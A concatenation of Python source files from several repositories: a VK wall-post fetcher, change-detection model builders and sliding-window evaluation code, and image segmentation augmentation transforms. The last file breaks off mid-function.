match = _GROUP_ALIAS_RE.match(profile_name)
if match is not None:
profile_name = 'club' + match.group(1)
profiles = _api('groups.getById', gid = profile_name, fields = 'photo_big,photo_medium,photo')
if not profiles:
raise ServerError(-1, 'Сообщество заблокировано.')
profile = profiles[0]
user = {
'id': -profile['gid'],
'name': profile['name'],
}
except ServerError as e:
# Invalid group ID
if e.code in (100, 125):
memcache.set(profile_name, {}, namespace = 'users', time = constants.HOUR_SECONDS)
raise ServerError(113, 'Пользователя не существует.')
else:
raise e
else:
raise e
if 'photo_big' in profile:
user['photo'] = profile['photo_big']
elif 'photo_medium' in profile:
user['photo'] = profile['photo_medium']
else:
user['photo'] = profile['photo']
memcache.set(profile_name, user, namespace = 'users', time = constants.DAY_SECONDS)
return user
def _get_wall(user, foreign_posts, offset, max_posts_num, users, posts):
'''Returns wall posts of the specified user.'''
reply = _api(
'wall.get', owner_id = user['id'], offset = offset, count = max_posts_num,
filter = 'all' if foreign_posts else 'owner', extended = 1)
posts.extend(reply['wall'][1:])
for profile in reply.get('profiles', []):
users[profile['uid']] = {
'name': profile['first_name'] + ' ' + profile['last_name'],
'photo': profile['photo'],
}
for profile in reply.get('groups', []):
users[-profile['gid']] = {
'name': profile['name'],
'photo': profile['photo'],
}
def _parse_text(text):
'''Parses a post text.'''
text = _TEXT_URL_RE.sub(r'\1<a href="\2">\2</a>\3', text)
text = _DOMAIN_ONLY_TEXT_URL_RE.sub(r'\1<a href="http://\2">\2</a>\3', text)
text = _USER_LINK_RE.sub(r'<b><a href="{}\1">\2</a></b>'.format(constants.VK_URL), text)
return text
``` |
{
"source": "Jokerming-MJ/CDLab",
"score": 2
} |
#### File: impl/builders/model_builders.py
```python
from core.misc import MODELS
@MODELS.register_func('UNet_model')
def build_unet_model(C):
from models.unet import UNet
return UNet(6, 2)
@MODELS.register_func('UNet_OSCD_model')
def build_unet_oscd_model(C):
from models.unet import UNet
return UNet(26, 2)
@MODELS.register_func('SiamUNet-diff_model')
def build_siamunet_diff_model(C):
from models.siamunet_diff import SiamUNet_diff
return SiamUNet_diff(3, 2)
@MODELS.register_func('SiamUNet-diff_OSCD_model')
def build_siamunet_diff_oscd_model(C):
from models.siamunet_diff import SiamUNet_diff
return SiamUNet_diff(13, 2)
@MODELS.register_func('SiamUNet-conc_model')
def build_siamunet_conc_model(C):
from models.siamunet_conc import SiamUNet_conc
return SiamUNet_conc(3, 2)
@MODELS.register_func('SiamUNet-conc_OSCD_model')
def build_siamunet_conc_oscd_model(C):
from models.siamunet_conc import SiamUNet_conc
return SiamUNet_conc(13, 2)
@MODELS.register_func('CDNet_model')
def build_cdnet_model(C):
from models.cdnet import CDNet
return CDNet(6, 2)
@MODELS.register_func('IFN_model')
def build_ifn_model(C):
from models.ifn import DSIFN
return DSIFN()
@MODELS.register_func('SNUNet_model')
def build_snunet_model(C):
from models.snunet import SNUNet
return SNUNet(3, 2, 32)
@MODELS.register_func('STANet_model')
def build_stanet_model(C):
from models.stanet import STANet
return STANet(**C['stanet_model'])
@MODELS.register_func('LUNet_model')
def build_lunet_model(C):
from models.lunet import LUNet
return LUNet(3, 2)
@MODELS.register_func('P2V_model')
def build_p2v_model(C):
from models.p2v import P2VNet
return P2VNet(**C['p2v_model'])
@MODELS.register_func('DSAMNet_model')
def build_dsamnet_model(C):
from models.dsamnet import DSAMNet
return DSAMNet(**C['dsamnet_model'])
@MODELS.register_func('BIT_model')
def build_bit_model(C):
from models.bit import BIT
return BIT(**C['bit_model'])
@MODELS.register_func('CDP_model')
def build_cdp_model(C):
try:
import change_detection_pytorch as cdp
except ModuleNotFoundError:
raise ModuleNotFoundError("The change_detection.pytorch library is not available!")
cdp_model_cfg = C['cdp_model'].copy()
arch = cdp_model_cfg.pop('arch')
encoder_name = cdp_model_cfg.pop('encoder_name')
encoder_weights = cdp_model_cfg.pop('encoder_weights')
in_channels = cdp_model_cfg.pop('in_channels')
classes = cdp_model_cfg.pop('classes')
model = cdp.create_model(
arch=arch,
encoder_name=encoder_name,
encoder_weights=encoder_weights,
in_channels=in_channels,
classes=classes,
**cdp_model_cfg
)
return model
```
#### File: CDLab/src/sw_test.py
```python
import argparse
import os.path as osp
from glob import iglob
import torch
import numpy as np
from skimage.io import imread, imsave
import core
import impl.builders
import impl.trainers
from core.misc import R
from core.config import parse_args
from core.factories import model_factory
from utils.metrics import Precision, Recall, F1Score, Accuracy
from utils.data_utils.preprocessors import Normalize
from utils.data_utils.misc import to_tensor, to_array, quantize_8bit
class WindowGenerator:
def __init__(self, h, w, ch, cw, si=1, sj=1):
self.h = h
self.w = w
self.ch = ch
self.cw = cw
if self.h < self.ch or self.w < self.cw:
raise NotImplementedError
self.si = si
self.sj = sj
self._i, self._j = 0, 0
def __next__(self):
# Column-first movement
if self._i > self.h:
raise StopIteration
bottom = min(self._i+self.ch, self.h)
right = min(self._j+self.cw, self.w)
top = max(0, bottom-self.ch)
left = max(0, right-self.cw)
if self._j >= self.w-self.cw:
if self._i >= self.h-self.ch:
# Set an illegal value to enable early stopping
self._i = self.h+1
self._goto_next_row()
else:
self._j += self.sj
if self._j > self.w:
self._goto_next_row()
return slice(top, bottom, 1), slice(left, right, 1)
def __iter__(self):
return self
def _goto_next_row(self):
self._i += self.si
self._j = 0
class Preprocessor:
def __init__(self, mu, sigma, device):
self.norm = Normalize(np.asarray(mu), np.asarray(sigma))
self.device = device
def __call__(self, im):
im = self.norm(im)
im = to_tensor(im).unsqueeze(0).float()
im = im.to(self.device)
return im
class PostProcessor:
def __init__(self, out_type, out_key=0):
self.out_type = out_type
self.out_key = out_key
def __call__(self, pred):
if not isinstance(pred, torch.Tensor):
pred = pred[self.out_key]
if self.out_type == 'logits':
return to_array(torch.nn.functional.sigmoid(pred)[0,0])
elif self.out_type == 'logits2':
return to_array(torch.nn.functional.softmax(pred, dim=1)[0,1])
elif self.out_type == 'dist':
return to_array(pred.squeeze(1))
else:
raise ValueError
def sw_infer(t1, t2, model, window_size, stride, prep, postp):
h, w = t1.shape[:2]
win_gen = WindowGenerator(h, w, window_size, window_size, stride, stride)
prob_map = np.zeros((h,w), dtype=np.float)
cnt = np.zeros((h,w), dtype=np.float)
with torch.no_grad():
for rows, cols in win_gen:
patch1, patch2 = t1[rows, cols], t2[rows, cols]
patch1, patch2 = prep(patch1), prep(patch2)
pred = model(patch1, patch2)
prob = postp(pred)
prob_map[rows,cols] += prob
cnt[rows,cols] += 1
prob_map /= cnt
return prob_map
def prepare_model(args):
model = model_factory(args['model'], args)
ckp_dict = torch.load(args['ckp_path'])
model.load_state_dict(ckp_dict['state_dict'])
model.to(args['device'])
model.eval()
return model
def main():
# Parse commandline arguments
def parser_configurator(parser):
# HACK: replace the original parser by a new one
parser = argparse.ArgumentParser(conflict_handler='resolve')
parser.add_argument('--exp_config', type=str, default='')
parser.add_argument('--inherit_off', action='store_true')
parser.add_argument('--ckp_path', type=str)
parser.add_argument('--device', type=str, default='cpu')
parser.add_argument('--t1_dir', type=str, default='')
parser.add_argument('--t2_dir', type=str, default='')
parser.add_argument('--out_dir', type=str, default='')
parser.add_argument('--gt_dir', type=str, default='')
parser.add_argument('--window_size', type=int, default=256)
parser.add_argument('--stride', type=int, default=256)
parser.add_argument('--save_on', action='store_true')
parser.add_argument('--mu', type=float, nargs='+', default=(0.0,0.0,0.0))
parser.add_argument('--sigma', type=float, nargs='+', default=(255.0,255.0,255.0))
parser.add_argument('--glob', type=str, default='*.png')
parser.add_argument('--threshold', type=float, default=0.5)
parser.add_argument('--out_type', type=str, choices=['logits', 'logits2', 'dist'], default='logits')
return parser
args = parse_args(parser_configurator)
logger = R['Logger']
model = prepare_model(args)
prep = Preprocessor(args['mu'], args['sigma'], args['device'])
postp = PostProcessor(args['out_type'])
prec, rec, f1, acc = Precision(mode='accum'), Recall(mode='accum'), F1Score(mode='accum'), Accuracy(mode='accum')
try:
for i, path in enumerate(iglob(osp.join(args['gt_dir'], args['glob']))):
basename = osp.basename(path)
gt = (imread(path)>0).astype('uint8')
t1 = imread(osp.join(args['t1_dir'], basename))
t2 = imread(osp.join(args['t2_dir'], basename))
prob_map = sw_infer(t1, t2, model, args['window_size'], args['stride'], prep, postp)
cm = (prob_map>args['thresh']).astype('uint8')
prec.update(cm, gt)
rec.update(cm, gt)
f1.update(cm, gt)
acc.update(cm, gt)
logger.show("{:>4} Precision: {:.4f} Recall: {:.4f} F1: {:.4f} OA: {:.4f}".format(
i, prec.val, rec.val, f1.val, acc.val
))
if args['save_on']:
imsave(osp.join(args['out_dir'], basename), quantize_8bit(cm))
except BaseException as e:
import traceback
import sys
import pdb
logger.fatal(traceback.format_exc())
pdb.post_mortem(sys.exc_info()[2])
exit(1)
if __name__ == '__main__':
main()
```
#### File: utils/data_utils/misc.py
```python
import torch
import numpy as np
import cv2
from scipy.io import loadmat
from skimage.io import imread
from imageio import mimsave
def default_loader(path_):
return imread(path_)
def mat_loader(path_):
return loadmat(path_)
def save_gif(uri, img_seq):
mimsave(uri, img_seq)
def to_tensor(arr):
if any(s < 0 for s in arr.strides):
arr = np.ascontiguousarray(arr)
if arr.ndim < 3:
return torch.from_numpy(arr)
elif arr.ndim == 3:
return torch.from_numpy(np.transpose(arr, (2,0,1)))
else:
raise ValueError
def to_array(tensor):
if tensor.ndim <= 4:
arr = tensor.data.cpu().numpy()
if tensor.ndim in (3, 4):
arr = np.moveaxis(arr, -3, -1)
return arr
else:
raise ValueError
def normalize_minmax(x):
EPS = 1e-32
return (x-x.min()) / (x.max()-x.min()+EPS)
def normalize_8bit(x):
return x/255.0
def to_pseudo_color(gray, color_map=cv2.COLORMAP_JET):
# Reverse channels to convert BGR to RGB
return cv2.applyColorMap(gray, color_map)[...,::-1]
def quantize_8bit(x):
# [0.0,1.0] float => [0,255] uint8
# or [0,1] int => [0,255] uint8
return (x*255).astype('uint8')
``` |
{
"source": "Jokerming-MJ/cutmix-semisup-seg",
"score": 3
} |
#### File: cutmix-semisup-seg/datapipe/seg_transforms_cv.py
```python
import math
import cv2
import numpy as np
from skimage import img_as_float
from datapipe import affine
from datapipe.seg_transforms import SegTransform
# PyTorch data loaders use multi-processing.
# OpenCV uses threads that are not replicated when the process is forked,
# causing OpenCV functions to lock up, so we have to tell OpenCV not to use threads
cv2.setNumThreads(0)
class SegCVTransformPad (SegTransform):
def pad_single(self, sample, min_size):
sample = sample.copy()
image = sample['image_arr']
# image, labels, mask, xf = seg_img.image, seg_img.labels, seg_img.mask, seg_img.xf
img_size = image.shape[:2]
if img_size[0] < min_size[0] or img_size[1] < min_size[1]:
# Padding required
# Compute padding
pad_h = max(min_size[0] - img_size[0], 0)
pad_w = max(min_size[1] - img_size[1], 0)
h0 = pad_h // 2
h1 = pad_h - h0
w0 = pad_w // 2
w1 = pad_w - w0
# Add an alpha channel to the image so that we can use it during standardisation
# to ensure that the padding area has a value of 0, post mean-subtraction
alpha_channel = np.ones(img_size + (1,), dtype=image.dtype) * 255
image = np.append(image[:, :, :3], alpha_channel, axis=2)
# Apply
sample['image_arr'] = np.pad(image, [[h0, h1], [w0, w1], [0, 0]], mode='constant', constant_values=0)
if 'labels_arr' in sample:
sample['labels_arr'] = np.pad(sample['labels_arr'], [[h0, h1], [w0, w1]], mode='constant', constant_values=255)
if 'mask_arr' in sample:
sample['mask_arr'] = np.pad(sample['mask_arr'], [[h0, h1], [w0, w1]], mode='constant')
if 'xf_cv' in sample:
sample['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(np.array([[w0, h0]])),
sample['xf_cv'][None, ...]
)[0]
return sample
def pad_pair(self, sample0, sample1, min_size):
sample0 = sample0.copy()
sample1 = sample1.copy()
image0 = sample0['image_arr']
image1 = sample1['image_arr']
img_size0 = image0.shape[:2]
if img_size0[0] < min_size[0] or img_size0[1] < min_size[1]:
# Padding required
# Compute padding
pad_h = max(min_size[0] - img_size0[0], 0)
pad_w = max(min_size[1] - img_size0[1], 0)
h0 = pad_h // 2
h1 = pad_h - h0
w0 = pad_w // 2
w1 = pad_w - w0
# Add an alpha channel to the image so that we can use it during standardisation
# to ensure that the padding area has a value of 0, post mean-subtraction
alpha_channel = np.ones(img_size0 + (1,), dtype=image0.dtype) * 255
image0 = np.append(image0[:, :, :3], alpha_channel, axis=2)
image1 = np.append(image1[:, :, :3], alpha_channel, axis=2)
# Apply
sample0['image_arr'] = np.pad(image0, [[h0, h1], [w0, w1], [0, 0]], mode='constant', constant_values=0)
sample1['image_arr'] = np.pad(image1, [[h0, h1], [w0, w1], [0, 0]], mode='constant', constant_values=0)
if 'labels_arr' in sample0:
sample0['labels_arr'] = np.pad(sample0['labels_arr'], [[h0, h1], [w0, w1]], mode='constant', constant_values=255)
sample1['labels_arr'] = np.pad(sample1['labels_arr'], [[h0, h1], [w0, w1]], mode='constant', constant_values=255)
if 'mask_arr' in sample0:
sample0['mask_arr'] = np.pad(sample0['mask_arr'], [[h0, h1], [w0, w1]], mode='constant')
sample1['mask_arr'] = np.pad(sample1['mask_arr'], [[h0, h1], [w0, w1]], mode='constant')
if 'xf_cv' in sample0:
pad_xlat = affine.translation_matrices(np.array([[w0, h0]]))
sample0['xf_cv'] = affine.cat_nx2x3(pad_xlat, sample0['xf_cv'][None, ...])[0]
sample1['xf_cv'] = affine.cat_nx2x3(pad_xlat, sample1['xf_cv'][None, ...])[0]
return (sample0, sample1)
class SegCVTransformRandomCrop (SegCVTransformPad):
def __init__(self, crop_size, crop_offset, rng=None):
if crop_offset is None:
crop_offset = [0, 0]
self.crop_size = np.array(crop_size)
self.crop_offset = np.array(crop_offset)
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
def transform_single(self, sample):
sample = self.pad_single(sample, self.crop_size)
image = sample['image_arr']
extra = np.array(image.shape[:2]) - self.crop_size
pos = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
sample['image_arr'] = image[pos[0]:pos[0]+self.crop_size[0], pos[1]:pos[1]+self.crop_size[1]]
if 'labels_arr' in sample:
sample['labels_arr'] = sample['labels_arr'][pos[0]:pos[0]+self.crop_size[0], pos[1]:pos[1]+self.crop_size[1]]
if 'mask_arr' in sample:
sample['mask_arr'] = sample['mask_arr'][pos[0]:pos[0] + self.crop_size[0], pos[1]:pos[1] + self.crop_size[1]]
if 'xf_cv' in sample:
sample['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(-pos[None, ::-1].astype(float)),
sample['xf_cv'][None, ...]
)[0]
return sample
def transform_pair(self, sample0, sample1):
# Pad the image if necessary
sample0, sample1 = self.pad_pair(sample0, sample1, self.crop_size)
# Randomly choose positions of each crop
extra = np.array(sample0['image_arr'].shape[:2]) - self.crop_size
pos0 = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
pos1 = pos0 + np.round(self.crop_offset * self.rng.uniform(-1.0, 1.0, size=(2,))).astype(int)
# Ensure pos1 cannot go out of bounds
pos1 = np.clip(pos1, np.array([0, 0]), extra)
# Extract crop and scale to target size
sample0['image_arr'] = sample0['image_arr'][pos0[0]:pos0[0] + self.crop_size[0], pos0[1]:pos0[1] + self.crop_size[1]]
sample1['image_arr'] = sample1['image_arr'][pos1[0]:pos1[0] + self.crop_size[0], pos1[1]:pos1[1] + self.crop_size[1]]
sample0['mask_arr'] = sample0['mask_arr'][pos0[0]:pos0[0] + self.crop_size[0], pos0[1]:pos0[1] + self.crop_size[1]]
sample1['mask_arr'] = sample1['mask_arr'][pos1[0]:pos1[0] + self.crop_size[0], pos1[1]:pos1[1] + self.crop_size[1]]
if 'labels_arr' in sample0:
sample0['labels_arr'] = sample0['labels_arr'][pos0[0]:pos0[0] + self.crop_size[0], pos0[1]:pos0[1] + self.crop_size[1]]
sample1['labels_arr'] = sample1['labels_arr'][pos1[0]:pos1[0] + self.crop_size[0], pos1[1]:pos1[1] + self.crop_size[1]]
if 'xf_cv' in sample0:
sample0['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(-pos0[None, ::-1]),
sample0['xf_cv'][None, ...]
)[0]
sample1['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(-pos1[None, ::-1]),
sample1['xf_cv'][None, ...]
)[0]
return (sample0, sample1)
class SegCVTransformRandomCropScaleHung (SegCVTransformPad):
"""
Random crop with random scale.
"""
def __init__(self, crop_size, crop_offset, uniform_scale=True, rng=None):
if crop_offset is None:
crop_offset = [0, 0]
self.crop_size = tuple(crop_size)
self.crop_size_arr = np.array(crop_size)
self.crop_offset = np.array(crop_offset)
self.uniform_scale = uniform_scale
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
def transform_single(self, sample0):
sample0 = sample0.copy()
scale_dim = 1 if self.uniform_scale else 2
# Draw scale factor
f_scale = 0.5 + self.rng.randint(0, 11, size=(scale_dim,)) / 10.0
# Scale the crop size by the inverse of the scale
sc_size = np.round(self.crop_size_arr / f_scale).astype(int)
sample0 = self.pad_single(sample0, sc_size)
image, labels, mask, xf = sample0['image_arr'], sample0.get('labels_arr'), sample0.get('mask_arr'), sample0.get('xf_cv')
# Randomly choose position
extra = np.array(image.shape[:2]) - sc_size
pos = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
# Extract crop and scale to target size
image = image[pos[0]:pos[0]+sc_size[0], pos[1]:pos[1]+sc_size[1]]
sample0['image_arr'] = cv2.resize(image, self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
if labels is not None:
labels = labels[pos[0]:pos[0]+sc_size[0], pos[1]:pos[1]+sc_size[1]]
sample0['labels_arr'] = cv2.resize(labels, self.crop_size[::-1], interpolation = cv2.INTER_NEAREST)
if mask is not None:
mask = mask[pos[0]:pos[0] + sc_size[0], pos[1]:pos[1] + sc_size[1]]
sample0['mask_arr'] = cv2.resize(mask, self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
if xf is not None:
# Matching `cv2.resize` requires:
# - scale factor of out_size/in_size
# - a translation of (scale_factor - 1) / 2
scale_factor_yx = self.crop_size_arr / sc_size
resize_xlat_yx = (scale_factor_yx - 1.0) * 0.5
sample0['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(resize_xlat_yx[None, ::-1].astype(float)),
affine.scale_matrices(scale_factor_yx[None, ::-1]),
affine.translation_matrices(-pos[None, ::-1].astype(float)),
xf[None, ...]
)[0]
return sample0
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
scale_dim = 1 if self.uniform_scale else 2
# Draw a scale factor for the second crop (crop1 from crop0,crop1)
f_scale1 = 0.5 + self.rng.randint(0, 11, size=(scale_dim,)) / 10.0
# Scale the crop size by the inverse of the scale
sc_size1 = np.round(self.crop_size_arr / f_scale1).astype(int)
# Compute the maximum crop size that we need
max_sc_size = np.maximum(self.crop_size_arr, sc_size1)
# Pad the image if necessary
sample0, sample1 = self.pad_pair(sample0, sample1, max_sc_size)
# Randomly choose positions of each crop
extra = np.array(sample0['image_arr'].shape[:2]) - max_sc_size
pos0 = np.round(extra * self.rng.uniform(0.0, 1.0, size=(2,))).astype(int)
pos1 = pos0 + np.round(self.crop_offset * self.rng.uniform(-1.0, 1.0, size=(2,))).astype(int)
# Ensure pos1 cannot go out of bounds
pos1 = np.clip(pos1, np.array([0, 0]), extra)
centre0 = pos0 + max_sc_size * 0.5
centre1 = pos1 + max_sc_size * 0.5
pos0 = np.round(centre0 - self.crop_size_arr * 0.5).astype(int)
pos1 = np.round(centre1 - sc_size1 * 0.5).astype(int)
# Extract crop and scale to target size
sample0['image_arr'] = sample0['image_arr'][pos0[0]:pos0[0] + self.crop_size_arr[0], pos0[1]:pos0[1] + self.crop_size_arr[1]]
sample1['image_arr'] = sample1['image_arr'][pos1[0]:pos1[0] + sc_size1[0], pos1[1]:pos1[1] + sc_size1[1]]
# image0 = cv2.resize(image0, self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
sample1['image_arr'] = cv2.resize(sample1['image_arr'], self.crop_size[::-1], interpolation=cv2.INTER_LINEAR)
if 'mask_arr' in sample0:
sample0['mask_arr'] = sample0['mask_arr'][pos0[0]:pos0[0] + self.crop_size_arr[0], pos0[1]:pos0[1] + self.crop_size_arr[1]]
sample1['mask_arr'] = sample1['mask_arr'][pos1[0]:pos1[0] + sc_size1[0], pos1[1]:pos1[1] + sc_size1[1]]
# mask0 = cv2.resize(mask0, self.crop_size[::-1], interpolation=cv2.INTER_NEAREST)
sample1['mask_arr'] = cv2.resize(sample1['mask_arr'], self.crop_size[::-1], interpolation=cv2.INTER_NEAREST)
if 'labels_arr' in sample0:
sample0['labels_arr'] = sample0['labels_arr'][pos0[0]:pos0[0] + self.crop_size_arr[0], pos0[1]:pos0[1] + self.crop_size_arr[1]]
sample1['labels_arr'] = sample1['labels_arr'][pos1[0]:pos1[0] + sc_size1[0], pos1[1]:pos1[1] + sc_size1[1]]
# labels0 = cv2.resize(labels0, self.crop_size[::-1], interpolation = cv2.INTER_NEAREST)
sample1['labels_arr'] = cv2.resize(sample1['labels_arr'], self.crop_size[::-1], interpolation = cv2.INTER_NEAREST)
if 'xf_cv' in sample0:
xf01 = np.stack([sample0['xf_cv'], sample1['xf_cv']], axis=0)
positions_xy = np.append(pos0[None, ::-1], pos1[None, ::-1], axis=0)
# Matching `cv2.resize` requires:
# - scale factor of out_size/in_size
# - a translation of (scale_factor - 1) / 2
scale_factors_xy = np.append(
np.array([[1, 1]]),
self.crop_size_arr[None, ::-1].astype(float) / sc_size1[None, ::-1],
axis=0
)
resize_xlats_xy = (scale_factors_xy - 1.0) * 0.5
xf01 = affine.cat_nx2x3(
affine.translation_matrices(resize_xlats_xy),
affine.scale_matrices(scale_factors_xy),
affine.translation_matrices(-positions_xy),
xf01,
)
sample0['xf_cv'] = xf01[0]
sample1['xf_cv'] = xf01[1]
return sample0, sample1
class SegCVTransformRandomCropRotateScale (SegCVTransformPad):
"""
Random crop with random scale.
"""
def __init__(self, crop_size, crop_offset, rot_mag, max_scale, uniform_scale=True, constrain_rot_scale=True,
rng=None):
if crop_offset is None:
crop_offset = [0, 0]
self.crop_size = tuple(crop_size)
self.crop_size_arr = np.array(crop_size)
self.crop_offset = np.array(crop_offset)
self.rot_mag_rad = math.radians(rot_mag)
self.log_max_scale = np.log(max_scale)
self.uniform_scale = uniform_scale
self.constrain_rot_scale = constrain_rot_scale
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
def transform_single(self, sample0):
sample0 = sample0.copy()
# Extract contents
image = sample0['image_arr']
# Choose scale and rotation
if self.uniform_scale:
scale_factor_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(1,)))
scale_factor_yx = np.repeat(scale_factor_yx, 2, axis=0)
else:
scale_factor_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(2,)))
rot_theta = self.rng.uniform(-self.rot_mag_rad, self.rot_mag_rad, size=(1,))
# Scale the crop size by the inverse of the scale
sc_size = self.crop_size_arr / scale_factor_yx
# Randomly choose centre
img_size = np.array(image.shape[:2])
extra = np.maximum(img_size - sc_size, 0.0)
centre = extra * self.rng.uniform(0.0, 1.0, size=(2,)) + np.minimum(sc_size, img_size) * 0.5
# Build affine transformation matrix
local_xf = affine.cat_nx2x3(
affine.translation_matrices(self.crop_size_arr[None, ::-1] * 0.5),
affine.rotation_matrices(rot_theta),
affine.scale_matrices(scale_factor_yx[None, ::-1]),
affine.translation_matrices(-centre[None, ::-1]),
)
# Reflect the image
# Use nearest neighbour sampling to stay consistent with labels, if labels present
if 'labels_arr' in sample0:
interpolation = cv2.INTER_NEAREST
else:
interpolation = self.rng.choice([cv2.INTER_NEAREST, cv2.INTER_LINEAR])
sample0['image_arr'] = cv2.warpAffine(image, local_xf[0], self.crop_size[::-1], flags=interpolation, borderValue=0, borderMode=cv2.BORDER_REFLECT_101)
# Don't reflect labels and mask
if 'labels_arr' in sample0:
sample0['labels_arr'] = cv2.warpAffine(sample0['labels_arr'], local_xf[0], self.crop_size[::-1], flags=cv2.INTER_NEAREST, borderValue=255, borderMode=cv2.BORDER_CONSTANT)
if 'mask_arr' in sample0:
sample0['mask_arr'] = cv2.warpAffine(sample0['mask_arr'], local_xf[0], self.crop_size[::-1], flags=interpolation, borderValue=0, borderMode=cv2.BORDER_CONSTANT)
if 'xf_cv' in sample0:
sample0['xf_cv'] = affine.cat_nx2x3(local_xf, sample0['xf_cv'][None, ...])[0]
return sample0
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
# Choose scales and rotations
if self.constrain_rot_scale:
if self.uniform_scale:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(1, 1)))
scale_factors_yx = np.repeat(scale_factors_yx, 2, axis=1)
else:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(1, 2)))
rot_thetas = self.rng.uniform(-self.rot_mag_rad, self.rot_mag_rad, size=(1,))
scale_factors_yx = np.repeat(scale_factors_yx, 2, axis=0)
rot_thetas = np.repeat(rot_thetas, 2, axis=0)
else:
if self.uniform_scale:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(2, 1)))
scale_factors_yx = np.repeat(scale_factors_yx, 2, axis=1)
else:
scale_factors_yx = np.exp(self.rng.uniform(-self.log_max_scale, self.log_max_scale, size=(2, 2)))
rot_thetas = self.rng.uniform(-self.rot_mag_rad, self.rot_mag_rad, size=(2,))
img_size = np.array(sample0['image_arr'].shape[:2])
# Scale the crop size by the inverse of the scale
sc_size = self.crop_size_arr / scale_factors_yx.min(axis=0)
crop_centre_pos = np.minimum(sc_size, img_size) * 0.5
# Randomly choose centres
extra = np.maximum(img_size - sc_size, 0.0)
centre0 = extra * self.rng.uniform(0.0, 1.0, size=(2,)) + crop_centre_pos
offset1 = np.round(self.crop_offset * self.rng.uniform(-1.0, 1.0, size=(2,)))
centre_xlat = np.stack([centre0, centre0], axis=0)
offset1_xlat = np.stack([np.zeros((2,)), offset1], axis=0)
# Build affine transformation matrices
local_xfs = affine.cat_nx2x3(
affine.translation_matrices(self.crop_size_arr[None, ::-1] * 0.5),
affine.translation_matrices(offset1_xlat[:, ::-1]),
affine.rotation_matrices(rot_thetas),
affine.scale_matrices(scale_factors_yx[:, ::-1]),
affine.translation_matrices(-centre_xlat[:, ::-1]),
)
# Use nearest neighbour sampling to stay consistent with labels, if labels present
interpolation = cv2.INTER_NEAREST if 'labels_arr' in sample0 else cv2.INTER_LINEAR
sample0['image_arr'] = cv2.warpAffine(sample0['image_arr'], local_xfs[0], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_REFLECT_101)
sample1['image_arr'] = cv2.warpAffine(sample1['image_arr'], local_xfs[1], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_REFLECT_101)
if 'labels_arr' in sample0:
sample0['labels_arr'] = cv2.warpAffine(sample0['labels_arr'], local_xfs[0], self.crop_size[::-1], flags=cv2.INTER_NEAREST,
borderValue=255, borderMode=cv2.BORDER_CONSTANT)
sample1['labels_arr'] = cv2.warpAffine(sample1['labels_arr'], local_xfs[1], self.crop_size[::-1], flags=cv2.INTER_NEAREST,
borderValue=255, borderMode=cv2.BORDER_CONSTANT)
if 'mask_arr' in sample0:
sample0['mask_arr'] = cv2.warpAffine(sample0['mask_arr'], local_xfs[0], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_CONSTANT)
sample1['mask_arr'] = cv2.warpAffine(sample1['mask_arr'], local_xfs[1], self.crop_size[::-1], flags=interpolation,
borderValue=0, borderMode=cv2.BORDER_CONSTANT)
if 'xf_cv' in sample0:
xf01 = affine.cat_nx2x3(local_xfs, np.stack([sample0['xf_cv'], sample1['xf_cv']], axis=0))
sample0['xf_cv'] = xf01[0]
sample1['xf_cv'] = xf01[1]
return (sample0, sample1)
class SegCVTransformRandomFlip (SegTransform):
def __init__(self, hflip, vflip, hvflip, rng=None):
self.hflip = hflip
self.vflip = vflip
self.hvflip = hvflip
self.__rng = rng
@property
def rng(self):
if self.__rng is None:
self.__rng = np.random.RandomState()
return self.__rng
@staticmethod
def flip_image(img, flip_xyd):
if flip_xyd[0]:
img = img[:, ::-1]
if flip_xyd[1]:
img = img[::-1, ...]
if flip_xyd[2]:
img = np.swapaxes(img, 0, 1)
return img.copy()
def transform_single(self, sample):
sample = sample.copy()
# Flip flags
flip_flags_xyd = self.rng.binomial(1, 0.5, size=(3,)) != 0
flip_flags_xyd = flip_flags_xyd & np.array([self.hflip, self.vflip, self.hvflip])
sample['image_arr'] = self.flip_image(sample['image_arr'], flip_flags_xyd)
if 'mask_arr' in sample:
sample['mask_arr'] = self.flip_image(sample['mask_arr'], flip_flags_xyd)
if 'labels_arr' in sample:
sample['labels_arr'] = self.flip_image(sample['labels_arr'], flip_flags_xyd)
if 'xf_cv' in sample:
sample['xf_cv'] = affine.cat_nx2x3(
affine.flip_xyd_matrices(flip_flags_xyd, sample['image_arr'].shape[:2]),
sample['xf_cv'][None, ...],
)[0]
return sample
def transform_pair(self, sample0, sample1):
sample0 = sample0.copy()
sample1 = sample1.copy()
# Flip flags
flip_flags_xyd = self.rng.binomial(1, 0.5, size=(2, 3)) != 0
flip_flags_xyd = flip_flags_xyd & np.array([[self.hflip, self.vflip, self.hvflip]])
sample0['image_arr'] = self.flip_image(sample0['image_arr'], flip_flags_xyd[0])
sample1['image_arr'] = self.flip_image(sample1['image_arr'], flip_flags_xyd[1])
if 'mask_arr' in sample0:
sample0['mask_arr'] = self.flip_image(sample0['mask_arr'], flip_flags_xyd[0])
